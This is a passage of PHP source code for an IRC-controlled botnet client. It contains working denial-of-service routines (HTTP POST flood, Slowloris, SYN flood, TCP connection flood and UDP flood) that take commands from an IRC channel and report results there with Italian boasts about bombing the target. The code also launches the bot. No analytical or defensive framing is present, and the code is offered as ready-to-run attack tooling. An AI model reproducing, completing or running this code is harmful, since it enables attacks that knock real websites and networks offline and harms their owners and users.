$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Finished!\2]");
}
public function attack_post($server, $host, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Started On : $server!\2]");
$request = "POST /" . md5(rand()) . " HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Content-Length: 1000000000\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Accept: *.*\r\n";
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
}
}
fclose($sockfd);
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Finished!\2]");
}
public function doSlow($host, $time) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWLORIS - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$i = 0;
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
$out = "POST / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
$out .= "X-a: " . rand(1, 10000) . "\r\n";
if (@fwrite($fs[$i], $out)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWLORIS - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function syn($host, $port, $time, $delay=1) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SYN - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$socks = array();
while (time() - $timei < $time) {
$numsocks++;
$socks[$numsocks] = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$socks[$numsocks]) continue;
@socket_set_nonblock($socks[$numsocks]);
for ($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SYN - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!! (".$numsocks." socks created)!\2]");
}
public function synflood($host, $port, $delay) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - Syn - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$socks = array();
$numsocks = 0;
$numsocks++;
$socks[$numsocks] = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if(!$socks[$numsocks])
continue;
@socket_set_nonblock($socks[$numsocks]);
for($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
for ($j = 0; $j < $numsocks; $j++) {
if($socks[$j])
@socket_close($socks[$j]);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - Syn - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]: Config - For $host:$port.");
}
public function udpflood($host, $port, $time, $packetsize) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - UDP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$packet = "";
for ($i = 0; $i < $packetsize; $i++) {
$packet .= chr(rand(1, 256));
}
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
while (true) {
fwrite($fp, $packet);
fflush($fp);
if ($i % 100 == 0) {
if($end < time())
break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - UDP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]: " . $env . " MB sent / Average: " . $vel . " MB/s ");
}
public function tcpconn($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - TCP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$end = time() + $time;
$i = 0;
while ($end > time()) {
$fp = fsockopen($host, $port, $dummy, $dummy, 1);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - TCP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]: sent " . $i . " connections to $host:$port.");
}
}
$bot = new pBot;
$bot->start($cfg);
function curl($url, $post=array(), $user_agent="", $deleteCookies=false) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
if ($user_agent) {
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
}
if (!empty($post)) {
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
}
if ($deleteCookies) {
file_put_contents("cookie.txt", "");
}
curl_setopt ($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($ch, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
//$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return $result;
}
function get_between($string,$start,$end) {
$string = " ".$string;
$ini = strpos($string, $start);
if($ini==0) return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
?>